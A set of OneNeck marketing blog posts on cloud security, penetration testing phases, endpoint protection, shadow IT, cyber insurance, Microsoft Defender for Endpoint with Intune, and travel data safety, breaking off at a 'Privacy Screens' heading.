Let’s visualize a secure cloud environment as a fortress designed with multiple layers of defense to deter potential threats. Firewalls are the primary gatekeepers, monitoring and controlling incoming and outgoing network traffic based on predetermined security policies. Intrusion Detection Systems (IDS) continuously scan for suspicious activities or policy violations, serving as vigilant sentinels that alert administrators to potential threats.

Inside the network, internal security measures are vital. Techniques like micro-segmentation create isolated environments, ensuring a breach in one segment doesn’t jeopardize the entire system. Intrusion Prevention Systems (IPS) don’t just detect threats; they actively block malicious activities, maintaining the network’s resilience against cyberattacks. Additionally, regular vulnerability assessments highlight weaknesses, allowing for timely remediation.

IAM: Beyond Simple Permissions

Identity and Access Management (IAM) extends beyond the basic premise of granting or denying access. At its core, IAM is a holistic approach to managing digital identities, ensuring that the right individuals access the right resources at the right times and for the right reasons.

Understanding user behavior is pivotal in this process. IAM systems can continuously monitor and analyze user activities and detect patterns and anomalies that might indicate potential security threats. It’s not only about the timing of access; accessing high-value data or making bulk data transfers when it’s not part of their usual tasks can also be flagged.

Furthermore, IAM systems can take proactive measures such as implementing multi-factor authentication (MFA). MFA requires the user to provide two or more verification factors to gain access, adding an extra layer of security and ensuring that even if a malicious actor has login credentials, they will still need another verification form, making unauthorized access significantly more challenging.

Proactive Defense: More than Just Monitoring

Managing vulnerabilities is an obvious cornerstone of cloud security. However, the reactionary nature of traditional anti-virus software can no longer address the sophisticated and agile nature of modern attacks.

Regular assessments and penetration tests help identify and address potential weak spots before attackers can exploit them. It’s crucial to have an efficient patch management system in place, ensuring that vulnerabilities are dealt with swiftly.

As businesses increasingly adopt container and microservices architectures, the need for security intensifies. It is essential to integrate protective measures from the development stage and maintain them throughout the software’s lifecycle. By proactively managing vulnerabilities, organizations can reduce the window of opportunity for potential exploits. This proactive stance protects applications and data and fosters a culture of ongoing vigilance, a necessity in an environment where threats can emerge unpredictably.

The Human Element of Cloud Security

While advanced tools and protocols are indispensable, the human element is pivotal. It’s a common misconception that most security breaches are solely due to technological vulnerabilities. Human error or oversight often serves as the gateway for cyberattacks. Without the proper knowledge, employees can inadvertently become the weakest link, falling prey to sophisticated phishing attacks or unintentionally mishandling sensitive data.

Recognizing this, organizations must invest in continuous cybersecurity education. Regular training sessions, enriched with the latest threat intelligence, equip employees with the skills to discern potential threats. Security Awareness Training on identifying phishing emails, safe browsing practices, and secure password management can transform employees from potential security risks to vigilant watchdogs.

Choosing a Cloud Service Partnership

Selecting the right Cloud Service Provider (CSP) is a critical decision. Your CSP needs to be much more than a vendor; they are integral to your organization’s security posture. It’s not just about the tools and features they offer but also about their approach to security as a whole.

When considering a CSP, it’s essential to delve into its security philosophy. Questions to ponder include: How frequently do they undergo security audits? How swiftly do they respond to identified threats? A reputable CSP will be forthright about its security protocols, past incidents and remediation measures. This transparency ensures that you’re not just choosing a service but entering into a partnership built on trust and mutual security goals.

Navigating Cloud Security with OneNeck

In the evolving landscape of modern cloud computing, businesses are presented with unparalleled opportunities and inherent challenges. As organizations leverage the cloud’s capabilities, the significance of robust security becomes increasingly evident. A comprehensive approach to cloud security, which integrates technology, processes, and the human element, is essential for a confident and risk-mitigated digital transition.

At OneNeck, we pride ourselves on being more than just a provider of technical services. With extensive expertise in cloud solutions, we offer a partnership built on trust, experience and dedication. As a leading Cloud Service Provider, we prioritize proactive security measures and have a deep understanding of the evolving threat landscape.

As you consider your next steps in the cloud domain, let our experience and expertise guide you. Contact us today to ensure your cloud endeavors are both innovative and secure.

Uncover Security Gaps with Proactive Pen Tests

The battle of cybersecurity is more of a game of chess than a warzone. As our reliance on digital platforms intensifies, so does the sophistication of attacks. And as cyber-attacks become more intelligent, our cybersecurity technology evolves in hopes that we can stay ahead of malicious actors before they access digital assets and personally identifiable information (PII).

But is it enough? Even with incredibly thorough security measures, there are still likely to be holes in any company’s attack surface. The only way to plug them is to find them—and the only way to find them is to use penetration testing.

What is penetration testing?

Penetration testing is a deliberate and approved cyber-attack on a computer system, carried out to assess and improve the security of the system.

Unlike actual cyber attacks, which aim to exploit systems for malicious intent, pen tests are conducted to identify vulnerabilities and weaknesses before bad actors do. These tests provide invaluable insights into potential attack vectors, enabling organizations to bolster their defenses and ensure data remains safe.

What are the types of pen testing?

Each type of penetration test offers important approaches to proactively find and address potential vulnerabilities. No test is fully comprehensive, so a mix of different types of tests is the best way to ensure a comprehensive review of your cybersecurity posture. Let’s explore these distinct methodologies.

• Black Box Testing: Here, the tester has no prior knowledge of the target system, mimicking the approach of real-world attackers who have no internal knowledge of the system.
• White Box Testing: Testers have full knowledge of the system’s architecture and source code. This approach is exhaustive and helps identify vulnerabilities deep within the system.
• Gray Box Testing: A middle ground between black and white box testing, testers have partial knowledge of the system. This testing is efficient in highlighting vulnerabilities from both internal and external perspectives.
• Red Team Testing: A dynamic approach where a group of ethical hackers simulate real-world cyber-attacks to test an organization’s detection and response capabilities.
• Blue Team Testing: Opposite to red teaming, blue team testing focuses on defense. Blue teams defend against simulated attacks and hone their incident response strategies.

Benefits of penetration testing

On average, 57% of attackers can complete an end-to-end attack in less than a day. While the basic benefit of pen testing is clear—uncovering vulnerabilities before they are exploited by malicious actors—there are many reasons why pen testing is valuable.

• Simulates real-world attack scenarios, giving an authentic picture of potential security breaches.
• Maintains compliance with regulations to avoid potential legal consequences.
• Demonstrates a commitment to security, which increases customer trust.
• Saves significant costs that might come from ransom payments, data loss, legal implications, penalties and lost business.
• Ensures that an organization’s defenses adapt and grow in tandem, always a step ahead of potential attackers.

The 5 phases of pen testing

The process of penetration testing is typically divided into five sequential phases. Each phase ensures your approach to testing is methodical, enabling you to identify security gaps so you can improve your security posture. Here are the five phases of penetration testing:

Pen Test Phase 1: Planning and Reconnaissance

Before the actual test, the objectives, scope and methods of the test are defined. This phase includes determining the systems to be tested and establishing the boundaries of the test.

From there, the tester begins reconnaissance by gathering as much information as possible about the target system. This could involve identifying IP addresses, domain details and network services. The idea is to find potential entry points and understand the system’s architecture.

Pen Test Phase 2: Scanning

This phase aims to identify how the target system will respond to various intrusion attempts. Testers can use tools and methods to detect vulnerabilities both statically (by analyzing application code) and dynamically (by evaluating the system while it’s running).

Pen Test Phase 3: Gaining Access

Now, testers try to exploit the identified vulnerabilities. This means they’ll attempt to hack into the system, mimicking potential real-world attacks. This phase demonstrates what type of data could be accessed or stolen from a successful breach.

Pen Test Phase 4: Maintaining Access

This phase simulates what cyber attackers do after they’ve breached a system. The goal is to understand if the system can detect and resist prolonged unauthorized presence. Testers attempt to create a “backdoor” for themselves, emulating how malware might operate to stay undetected within a compromised system.

Pen Test Phase 5: Analysis

Post-testing, this phase is all about documentation and feedback. A detailed report is generated, outlining vulnerabilities discovered, data accessed, methods used and the duration of the testers’ unnoticed presence in the system. The report also typically includes recommendations for securing the identified vulnerabilities, providing organizations with actionable insights to bolster their defenses.

Penetration Testing with OneNeck

Penetration testing is an important part of OneNeck’s suite of cybersecurity solutions. Our real-world risk assessment includes the execution of full-scope Red Team exercises, mimicking tactics and techniques employed by even the most recent threats. These tests go well beyond a standard checklist, revealing business-specific risks present in your network and infrastructure.

With OneNeck, you can keep moving forward because we’ve got your back. Learn more about our penetration testing solution or reach out for a free quote.

Endpoint Security is Essential to Protecting Your Network and Your Remote Workforce

You may not realize it, but one of the biggest threats to your network could be lurking in a coffee shop or someone’s pocket. Today, 70% of breaches originate on endpoints like desktops, laptops, mobile phones or tablets. Endpoint security is essential to protecting your organization’s network and data from threats and malicious attacks.

The Evolution of Endpoint Security

It used to be that all of your network users sat in the same building and used the same computers to access on-premises data. All you needed to protect your network was a simple antivirus program that could detect known threats.

That’s not the case anymore.

In recent years, most organizations have not only changed how their employees work—with many different devices, cloud and SaaS applications—but also where they work. Employees are just as likely to work remotely as they are to be in the office. With the increase in remote and hybrid work, we’ve gone from the office to working from anywhere, including home, the local coffee shop or on an international flight. Users can be on devices and networks that you can’t control or secure.

Why Do I Need Endpoint Security?

Endpoint security helps organizations protect critical systems and sensitive data from cyberattacks like phishing, malware and ransomware. Sixty-eight percent of companies say they’ve had their data or IT infrastructure compromised through endpoint attacks. The endpoints on your network may reside outside of your office building, but they are vulnerable to attackers and frequently targeted.

Your employees may not know if the Wi-Fi they’re using right now is secure or not. Or if the network is running out-of-date antivirus software or unpatched operating systems, which can increase the risk of security vulnerabilities. That’s why it’s vital to have an endpoint security strategy that will prevent attacks before they happen, as well as detect and respond to attacks as they’re happening.

How to Protect Your Assets with Endpoint Security

When your users and devices are off-network, they are the most vulnerable. Endpoint security measures protect your assets while still allowing employees easy access to your organization’s network.

Three ways to keep endpoints secure without compromising employee productivity are:

1. Verify—Establish that your users are who they say they are before you grant them access to the network. Do this by using multi-factor authentication (MFA), so your users are required to provide a second source of validation, like a phone or a token, to verify their identity.
2. Access—Provide a secure access point for remote workers with a Virtual Private Network (VPN). No matter where your users are, a VPN provides a secure connection to your network.
3. Defend—No matter what actions you take, attacks are still going to happen. Be ready for the inevitable by using DNS and endpoint security to block, detect and respond to attacks before they compromise your network.

Security Starts with OneNeck

Endpoint security isn’t something to leave to chance. As malicious attacks continue to rise, protecting your remote workers and securing endpoints is your first line of defense against a network breach.

At OneNeck IT Solutions, we’ve partnered with Cisco to provide a simple, effective security solution designed for your remote workers. Cisco’s Endpoint Security solution protects your remote workers by blocking endpoint attacks and helping you respond quickly to threats. OneNeck can help you protect your network with holistic security solutions that keep pace with the ever-changing cyber landscape.

Learn more by reading about endpoint security in this helpful guide from OneNeck and Cisco, Protecting Your Endpoints the Right Way.

Shadow IT, you’ve probably heard the term thrown around in tech circles and IT departments. It likely conjures images of something from a spy novel. However, it is real, affecting businesses across all industries. Shadow IT refers to IT applications, solutions, services or other technology used within a company without explicit organizational approval. This unauthorized use could include a team opting for a file-sharing app or an individual downloading software not supported by the IT department.

Today, the upswing of Shadow IT stems both from the pursuit of convenience as well as the rise of generative AI. As this innovative technology becomes more accessible and widespread, employees may be tempted to utilize AI tools and applications without official approval, adding another level to the Shadow IT landscape. Ultimately, Shadow IT is a concern that most companies must address, with a recent report showing that 77% of IT Professionals believe that shadow IT is a major issue.  Managing it effectively is key to organizational success.

Understanding the Appeal of Shadow IT

To effectively manage Shadow IT, it is vital to grasp why it appeals to employees in the first place. Shadow IT often emerges when employees perceive the officially approved tools and processes as cumbersome, slow or inefficient. A recent study from Beezy shows that 58% of employees aren’t satisfied with their company’s technologies. The allure of a more user-friendly tool or a platform offering greater functionality, such as generative AI tools, can be a strong incentive to bypass official channels. As these AI tools become more sophisticated and intuitive, they can seem attractive alternatives to traditional systems, further fueling their appeal.

Understanding the allure of Shadow IT also means acknowledging the resourcefulness of your employees. Faced with challenges or roadblocks, they seek solutions that enable them to do their job effectively. In the era of artificial intelligence, this might mean turning to advanced AI models like Chat GPT to streamline workflows or improve productivity. While this can pose risks when it leads to the use of unauthorized tools, it also indicates a proactive workforce. Recognizing this mindset can help channel innovative thinking toward safer, more compliant solutions.

In some cases, Shadow IT can highlight gaps or inefficiencies in current IT offerings. If a significant number of employees are turning to the same Shadow IT solution, this may indicate that existing tools aren’t fully meeting their needs. Rather than seeing this as a problem, consider it a source of important user feedback. It provides an opportunity to understand how IT offerings could be improved or expanded, thus fostering an environment of continuous improvement. By seeing Shadow IT as not just a risk but also a signal, you can better align IT strategy with employees’ actual needs, turning a potential threat into a tool for improvement.

The Risks

In many cases, Shadow IT may seem benign or, as mentioned above, a potential productivity booster, but it is critical to acknowledge its substantial risks. The most glaring risk is the potential for security breaches. Unsanctioned apps and services frequently do not adhere to the same stringent security protocols as officially approved tools. This discrepancy creates weak points in the security framework, leaving businesses vulnerable to data breaches.

Shadow IT solutions’ lack of stringent security protocols has real-world implications, the most notable being the loss of critical data. Unauthorized platforms may not be backed up properly or incorporated into an organization’s data recovery plan. Companies may suffer damages if these platforms experience a system failure or a cyber-attack, leading to significant setbacks, as lost data could include client information, sensitive employee details or even proprietary business data.

Furthermore, using Shadow IT raises serious compliance issues, especially in heavily regulated industries. Industries like healthcare, finance and education have strict security, privacy and data handling protocols. If employees are using non-approved software or services, it can inadvertently lead to compliance violations. Non-compliance can result in substantial fines, litigation costs or severe reputation damage. Shadow IT, thus, poses risks that extend far beyond immediate IT concerns, potentially impacting a business’ entire operation.

Managing Shadow IT: A Balancing Act

Managing Shadow IT isn’t about allowing a free-for-all or enforcing a strict ban; instead, it’s striking an appropriate balance:

• Discover Existing Shadow IT– Recognize existing Shadow IT within your organization. Utilize tools designed for this purpose, which can help you detect and catalog unauthorized software and services used by your employees.
• Assess Risks and Benefits– After identifying Shadow IT, thoroughly assess the associated risks and benefits. Consider conducting a security review for some tools categorized as Shadow IT, as they may benefit your organization’s workflow and could potentially be officially adopted.
• Formulate Clear IT Policies– Develop and implement a comprehensive policy that governs the use of IT resources within your organization. This policy should outline what is allowed and what isn’t. Once created, ensure these policies are effectively communicated across the organization to maintain clarity and transparency.
• Educate and Train Your Employees– It’s crucial to ensure all employees know the risks associated with Shadow IT and the importance of adhering to the set IT policies. This is not a one-off effort. Continuously incorporate this process into your regular training schedule to keep pace with changes in policy or technology.
• Block Questionable Applications– For any apps or services deemed a possible threat, block their usage and require employees to justify potential approval before granting the ability to download or install.
• Monitor Regularly– Implement a regular monitoring process to check for occurrences of Shadow IT within your organization. This continuous vigilance will help enforce your IT policies and help you stay aware of the use of new tools or applications outside approved channels.

How OneNeck Can Help

When appropriately managed, Shadow IT can spark growth and innovation while simultaneously mitigating risks and potential compliance issues. It’s about striking an equilibrium between security, flexibility and adapting to your employees’ needs.

Navigating the Shadow IT landscape can be challenging, but you don’t have to face this task alone. OneNeck offers services to secure, manage and transform your organization’s apps effectively. By viewing Shadow IT as an opportunity for continuous improvement and strategic advantage, we can help make sure your IT infrastructure is safe, efficient and tailored to your organization’s needs.

Contact us today to bring Shadow IT into the light and turn it from a cause for concern into a pathway toward innovation and growth.

Today’s modern workplace has ushered in a new reality where safeguarding digital assets is as crucial as protecting our physical ones. Safeguarding digital assets is particularly critical for organizations of all sizes, from small businesses to enterprises. Enter cybersecurity insurance, a specialized form of insurance designed to mitigate financial risks associated with cyber threats. What exactly is cybersecurity insurance? Why does your business need it? And how difficult is it to obtain?

What is Cybersecurity Insurance?

The Department of Homeland Security states that cybersecurity insurance, sometimes known as cyber liability insurance, is a measure designed to mitigate losses from cyber-incidents such as data breaches, business interruption, network damage and cyber extortion. Ultimately, it’s a risk transfer mechanism, allowing businesses to reposition some financial risks associated with data breaches and other cyber threats to an insurance company.

This insurance typically covers a range of expenses such as notification costs, credit monitoring, costs to defend claims leveled by regulators, fines and penalties, and loss resulting from identity theft. It’s a safety net to help organizations weather the storm of cyber threats.

Why Do You Need Cybersecurity Insurance?

Let’s look at the current cyber-threat landscape to answer this question. It is estimated that organizations currently suffer a ransomware attack every 11 seconds, and it is expected that there will be attacks on consumers and businesses every two seconds by 2031. As companies become increasingly reliant on digital technology, the risk of cyber threats escalates exponentially.

A cyberattack can result in significant financial losses due to business interruption, data recovery and reputational damage. Without a cybersecurity insurance policy, the cost of a data breach can be devastating. According to a recent IBM study, the global average price of a data breach in 2022 was $4.35 million.

Having cybersecurity insurance provides a financial buffer, allowing businesses to recover and bounce back faster. It’s not just about managing risk – it’s about resilience.

The Cost of Coverage

Cybersecurity insurance costs differ appreciably from one company to another based on numerous factors. Still, increasing numbers of businesses of all sizes are investing in this coverage to circumvent the burden of hefty immediate expenses in a cyber crisis.

The pricing of cybersecurity insurance takes into account several critical aspects of your business, including:

• Organizational scale and industry sector
• Quantity of sensitive information
• Annual earnings
• Efficacy security protocols and compliance measures
• Geographical location
• Nature of handled data
• Cyber incident history
• Current risk management practices
• Coverage limit and selected deductible
• Use of third-party services

It is important to note that costs are on the rise. To date, cybersecurity insurance has been relatively inexpensive. However, that low price point has begun to disappear. Insurers are raising rates dramatically and adding additional requirements for coverage, making it harder, if not impossible, for some to get. Higher premiums for public and private organizations result from the rising demand for coverage due to the frequency and higher costs of cybercrime incidents.

Cybersecurity Insurance: A Worthwhile Endeavor

Obtaining cybersecurity insurance isn’t inherently problematic, but it does require a thorough understanding of your business’s cyber risk profile. Insurance companies will often assess an organization’s cybersecurity posture before offering coverage. They consider factors such as the type of data you store, your industry sector, your company’s size, your existing cybersecurity measures, and your history of cyber incidents.

This assessment can pose a challenge for businesses without a robust cybersecurity framework. However, working with an experienced IT partner can help make this process smoother. They can assist in identifying and mitigating cyber risks, thereby improving your chances of securing suitable coverage.

In the end, while getting cybersecurity insurance might require some effort and investment, it’s a small price compared to the potential financial impact of a cyber-attack.

Securing Your Digital Future

In the digital age, cybersecurity insurance is not just an option anymore; it is a necessary part of any business risk management strategy. Just as businesses insure physical assets, it’s equally important to consider protecting digital assets. After all, in the modern workplace, a cyber-attack is not a matter of if but when.

For those who may find the process challenging, remember you do not have to navigate it alone. OneNeck is here to help guide you through the complexities of security and obtaining cybersecurity insurance. Our team has your back and will do whatever it takes to ensure your business has the protection it needs.

Contact us today and embark on your journey toward enhanced cybersecurity. Let us help you ensure a resilient business that is built for the digital challenges of today and future.

In today’s interconnected digital ecosystem, fortifying endpoint devices is no longer a luxury—it’s an absolute necessity. Every work-enabled laptop, mobile device or home desktop represents a potential gateway for bad actors. This situation amplifies the need for businesses to bolster their defenses and secure every endpoint.

The expansion of the work environment has dramatically increased the number of possible entry points for potential attackers. This change in the threat landscape has highlighted the vulnerabilities in many traditional security models. Protecting the new “borderless” network requires a more comprehensive approach. Endpoint security solutions have emerged as key players in providing robust protection, among which Microsoft Defender for Endpoint® has become a potent deterrent against advanced threats. Microsoft’s offering has earned respect throughout the industry, where Gartner has rated Defender for Endpoint as a “Leader” in its Magic Quadrant for Endpoint Protection Platforms (EPP) report, demonstrating its high ability to execute and a compelling vision for the future of endpoint security.

Unraveling Defender for Endpoint

Defender for Endpoint is an enterprise-grade platform designed to help businesses prevent, detect, investigate and respond to advanced threats. It showcases Microsoft’s commitment to providing wide-ranging protection for diverse digital environments. Initially exclusive to Windows, the solution now extends its security capabilities across macOS, Android and iOS mobile devices (managed by Intune) and servers powered by Windows or Linux. This breadth of coverage allows businesses to achieve comprehensive protection across their entire device ecosystem.

The value Defender for Endpoint extends beyond multi-platform compatibility and includes a proactive approach to threat management. It’s not about addressing vulnerabilities after an attack; it’s about fortifying defenses, anticipating threats and developing robust responses. This strategy is implemented through various aspects, each addressing a specific part of endpoint security. These components include asset discovery, threat and vulnerability management, attack surface reduction, next-generation protection and endpoint detection and response.

How does Defender for Endpoint accomplish this task? Its advanced security features and how it harnesses cloud security analytics turns endpoint behavioral signals into actionable insights, detections and responses. Built into Windows 10, Windows 11 and Server 2019+, these behavioral sensors collect and process signals from the operating system, while cloud security analytics add an extra layer of protection.

Defender for Endpoint Purchase Options

The platform offers two distinct purchase options, catering to the unique security needs of businesses of all sizes and scopes: P1 and P2. The P1 package is fundamentally centered on prevention, forming the backbone of your security infrastructure. It provides a robust and reliable foundation for your security needs, helping businesses fortify their digital assets and reduce their susceptibility to cyber threats. By investing in a solid preventive framework, companies can reduce the potential attack surface, making it harder for malicious entities to breach their defenses.

Alternatively, the P2 package delivers advanced capabilities beyond simple prevention. It incorporates critical features such as endpoint detection and response (EDR) and automated investigation and remediation (AIR). Additionally, P2 includes incident response and Threat and Vulnerability Management (TVM), enabling effective and timely responses to security incidents and providing vulnerability insights. The comprehensive nature of P2 makes it an optimal choice for businesses seeking robust, layered protection. The P1 and P2 options empower businesses to tailor security solutions to their specific needs, guaranteeing powerful protection.

Integrated Security: A Unified Experience

Defender for Endpoint isn’t a standalone product—it’s an integral part of a comprehensive security ecosystem. This ecosystem approach to security is a strategic move that underlines Microsoft’s commitment to providing businesses with a holistic security solution. Instead of viewing each aspect of cybersecurity as a separate entity, Microsoft has created an interconnected suite of tools where each component plays a critical role in maintaining the overall security posture of an organization.

One of the key strengths is the seamless integration of Microsoft Defender for Endpoint with various other Microsoft solutions. These solutions include Microsoft Defender for Cloud, Microsoft Sentinel, Intune/ Microsoft Endpoint Manager, Microsoft Defender for Cloud Apps, Microsoft Defender for Identity and Microsoft Defender for Office. This deep integration ensures a seamless security experience across all Microsoft solutions. It simplifies the management of security protocols and enhances the effectiveness of threat detection and response. By integrating these different tools, Microsoft provides businesses a unified platform to handle various security tasks, from endpoint protection to cloud security.

With a unified security experience, IT teams can easily navigate between different tools within the Microsoft suite, significantly reducing the time and effort spent on managing security protocols. Furthermore, the integration allows for more efficient threat intelligence and response strategies sharing across different tools. This means that a threat detected by one tool can be quickly communicated to the rest, facilitating a rapid and coordinated response. Defender for Endpoint plays a central role in fortifying businesses against a complex landscape of cyber threats through this comprehensive and interconnected approach.

The Components: A Closer Look

Defender for Endpoint isn’t just a single, one-size-fits-all solution. Instead, it’s a carefully assembled collection of components, each with its unique function, designed to bolster your overall endpoint security. Like puzzle pieces, these elements work together, creating a comprehensive, multi-angle approach to security. Some of the most important aspects include:

• Next-Generation Protection (NGP)– Going beyond the traditional MS Defender Antivirus measures, NGP provides robust real-time protection against sophisticated malware and zero-day exploits. Additionally, cloud-delivered protection delivers near-instant detection and blocking of new and emerging threats.
• Attack Surface Reduction (ASR)– Minimizes the potential entry points for threats, making it harder for attackers to infiltrate your systems. It’s a proactive measure to keep threats at bay via components such as ASR rules that target suspicious software behavior, hardware-based isolation, controlled folder access and device control removable storage protection.
• Endpoint Detection & Response– EDR uses machine learning, behavioral analysis and threat intelligence to provide real-time visibility into endpoint activity, identification and detection of abnormal activities or potential dangers and rapid response to minimize the impact of an attack.
• Automated Investigation and Remediation–AIR uses AI and machine learning to streamline the investigation of alerts, identify causes of potential threats and can then take remediation actions to contain an infected device or quarantine malicious files, thus automating tasks that typically require human intervention.
• Comprehensive Reporting and Alerting– Provides comprehensive reporting and alerting capabilities that give crucial visibility into an organization’s security posture and enable rapid response to potential threats.
• Microsoft Secure Score for Devices– This powerful tool helps organizations assess their security posture and identify areas where proactive improvements can be made to security defenses.

OneNeck and Microsoft: An Investment in Security

In an era defined by digital transformations, ensuring the security of endpoint devices is paramount. Defender for Endpoint stands as a powerful ally in this endeavor. Its wide-ranging compatibility across different operating systems and seamless integration with a host of Microsoft solutions make it a vital part of a comprehensive security strategy.

Ready to enhance your organization’s digital security posture? As an experienced Microsoft Cloud Solution Provider (CSP), OneNeck possesses extensive knowledge of Microsoft Defender for Endpoint and the Microsoft ecosystem. Our team can help you harness the power of these advanced tools, tailoring them to meet your specific needs. Don’t wait for a security breach to take action. Contact our team today!

The need for robust endpoint protection cannot be overstated. As network boundaries continue to blur with increases in remote work and the proliferation of mobile and IoT devices, endpoint protection has emerged as a critical aspect of network security. In this blog, we explore this process and examine two of Microsoft’s primary solutions: Microsoft Defender for Endpoint and Microsoft Intune.

Understanding Microsoft Defender for Endpoint

Microsoft Defender for Endpoint® is a platform designed to safeguard your organization’s endpoints, essentially any devices connecting to your network. These can range from traditional computing devices like desktops and laptops to modern smart devices and IoT gadgets.

Defender for Endpoint serves as a protective shield for your network by offering real-time threat detection, prevention, and response capabilities. But that’s not all it does. It also provides automated investigation capabilities, helping IT teams promptly detect and respond to threats, reducing time and resources spent on investigations.

Moreover, it facilitates threat intelligence sharing across platforms, enhancing an organization’s ability to proactively defend against potential threats. By harnessing artificial intelligence (AI) and integrating it with other security solutions, Defender for Endpoint ensures that your network remains resilient.

The Microsoft Defender Family: A Holistic Approach

The term “Microsoft Defender” often sparks confusion due to its broad scope. Contrary to what one might intuitively think, Microsoft Defender is not a single application but a family of interconnected security solutions designed to take a holistic approach to address digital protection. Given this complex arrangement, businesses often find it challenging to determine which specific product from the Defender suite best suits their needs.

While our focus here is on Defender for Endpoint, understanding what the entire MS Defender family brings to the table is important.  Some of the more prominent applications and add-ons include:

• Microsoft Defender for Office 365– Prevents volume-based and targeted attacks, phishing, ransomware and advanced malware with its robust filtering system. It uses AI to detect malicious and suspicious content and provides capabilities for identifying, prioritizing and investigating threats across Office 365.​
• Microsoft Defender for Identity– Helps Security Operations identify configuration vulnerabilities and prioritize the riskiest users in an organization. It also provides real-time analytics & data intelligence to threats​.
• Microsoft 365 Defender– Part of Microsoft’s XDR solution, it automatically analyzes threat data across domains, building a comprehensive picture of each attack in a single dashboard​​.
• Microsoft Defender for Cloud Apps– Acts as a cloud access security broker (CASB), providing multifunction visibility, control over data travel and sophisticated analytics. It helps organizations elevate security posture by combating cyber threats across all their cloud services​​.
• Microsoft Defender Vulnerability Management– Bolsters security and IT personnel by filling workflow gaps, enabling prioritization and remediation of critical vulnerabilities and misconfigurations throughout an organization.

These applications work in concert, providing an integrated, multi-layered defense strategy. This interconnectivity creates a centrally managed environment where endpoint protection is integral to your network security strategy rather than an isolated, independent function.

The Role of Microsoft Intune

Microsoft Intune®, a vital component of the Defender ecosystem, deserves special mention. Intune is a cloud-based service that provides comprehensive device and application management capabilities. It’s a tool that simplifies device management and establishes a secure foundation for your endpoint protection strategy.

Intune provides granular control over how devices access corporate data, allowing you to enforce compliance policies and regulate device access based on predefined rules. This ability to control device access is critical to any endpoint protection plan, as it ensures that only authorized devices are allowed to interact with your network.

In addition, Intune facilitates mobile application management, allowing you to control how corporate data is accessed and shared on mobile apps. This ability means protecting your data even when accessed from personal devices, ensuring that your business information remains secure, no matter where it’s accessed.

Interplay Between Intune and Defender for Endpoint

Intune and Defender for Endpoint are not standalone solutions; they work together to provide a comprehensive endpoint protection strategy. Intune sets the stage by establishing basic security controls and compliance policies, while Defender for Endpoint builds upon this foundation to provide advanced threat protection.

This interplay between Intune and Defender for Endpoint allows for an integrated and dynamic defense strategy. Defender for Endpoint and Intune ensure protection for both devices and data from threats by managing your endpoints and controlling their access to your network.

Why Organizations Need to Use Defender for Endpoint

The benefits of using Defender for Endpoint are numerous. It leverages advanced technologies, such as behavioral sensors and cloud-delivered security, to guard against known and unknown threats providing robust protection for your endpoints. This protection includes Zero Day attacks, ensuring your network remains protected even when new threats emerge.

In addition to securing devices, Defender for Endpoint provides application-level protection. It ensures that critical business software is protected from potential vulnerabilities, minimizing the exploitation risk to your applications. This level of security is essential as applications often serve as entry points for attackers.

Furthermore, Defender for Endpoint offers advanced threat-hunting capabilities. Using a rich data set collected from your endpoints it can uncover hidden breaches that traditional defenses might miss. This proactive approach to threat detection and response can significantly reduce the impact of security incidents.

Key Considerations for Implementation

First, it’s essential to understand Intune’s role in optimizing Defender’s effectiveness for endpoints. By leveraging Intune’s capabilities, you can manage antivirus, endpoint detection and response, and firewall policies from a single view, enhancing your organization’s security posture.

Integrating Intune and Defender for Endpoint also provides opportunities for automation, reducing manual tasks and freeing your IT team to focus on strategic initiatives. Furthermore, the rich reporting capabilities of both solutions provide valuable insights into your security posture, helping you make informed decisions and continuously improve your endpoint protection strategy.

Strengthening Your Endpoint Protection Strategy with OneNeck and Microsoft

As digital threats evolve, so must your endpoint protection strategy. Consider how Microsoft Defender for Endpoint and Intune can enhance your approach. By proactively managing and securing your endpoints, you can protect your network, data and, ultimately, your organization. Start your journey with Microsoft Defender for Endpoint and Microsoft Intune today and step up your endpoint protection game.

As an experienced Microsoft CSP and IT security provider, OneNeck is positioned perfectly to be your trusted partner. We specialize in deploying layered security strategies that provide comprehensive protection, from the DNS layer, through the network to the endpoint. We leverage the power of Microsoft Defender for Endpoint, Microsoft Intune and other essential security tools to ensure your digital assets are well-protected.

Ready to boost your organization’s defenses? Contact us today for a personalized consultation on how Microsoft Defender for Endpoint and Microsoft Intune can protect your digital assets.

You’ve likely recently come across a warning from the FBI about the risks of using public USB ports. It is a healthy reminder of the ever-present threat of hackers and the need to practice good general security habits, especially when traveling. In this blog, we’ll discuss crucial tips for maintaining digital privacy and data security while traveling, whether at an airport, coffee shop hotel or any public setting. After all, protecting personal and business data is always a shared responsibility.

Public USB Port as a Risk to Data Security

The specific FBI caution against using public USB ports centered around “juice jacking.” While juice jacking is just one method for the corruption of USB ports, it is a particularly deceptive technique in which hackers use public charging stations to access a device’s data or install malware. Connecting a device to a compromised charging port or using a tampered charging cable allows attackers to potentially access the device’s data, passwords and other sensitive information. In some cases, they might even install malware that can remotely control the device, monitor activities, encrypt data and demand a ransom.

So, what can you do to protect yourself from these attacks? The most straightforward practice is always to carry a wall port to plug your USB cable into. This basic precaution can go a long way in helping you avoid potential breaches and compromised devices.

There are still options when traveling internationally or if you cannot access a plug-in power source. You can bring a USB battery pack or use a personal USB cable to charge directly from another of your devices. Another option is a charge-only USB cord, known as a “USB condom.” These protective items are an affordable and effective solution that significantly reduces the risk of compromising your data while charging devices.

One other essential note, it’s crucial to keep your device’s software up to date since outdated software is more vulnerable to attacks. Installing security patches and system updates as soon as they become available safeguards your device against known vulnerabilities.

Data Security While Traveling

It’s important to note that public USB port risks are not the only data security threats faced when traveling or in public settings. In addition to these threats, other potential risks exist, such as shoulder surfing and cyber-attacks through seemingly trustworthy Wi-Fi networks.

As a traveler or someone frequently in public settings, it is essential to be aware of these diverse risks and adopt a comprehensive approach to protecting data. These precautions include being careful about the networks you connect to, the information you share and how you handle devices in public spaces.

VPNs and Wi-Fi Security

Free Wi-Fi networks, often found in airports, hotels and coffee shops, pose significant problems. These networks frequently lack proper management, making them vulnerable to security threats from bad actors waiting for easy targets. Additionally, they likely don’t encrypt or protect browsing traffic, and might require the sharing of some personal information to gain access. If possible, consider using a personal hotspot from mobile device to ensure the greater security. Using a personal hotspot lets you control the network you’re connecting to, making it less likely for hackers to intercept data.

Using a virtual private network (VPN) to secure your internet connection is essential when away from home or office networks. A VPN establishes an encrypted tunnel between your device and the internet, protecting data from potential eavesdroppers and hackers. When selecting a VPN service, choose one with a strong reputation, end-to-end encryption and a no-logs policy. “No-logs” means the VPN provider doesn’t store information about online activities, ensuring your privacy remains protected even if the provider is compromised.

Privacy Screens

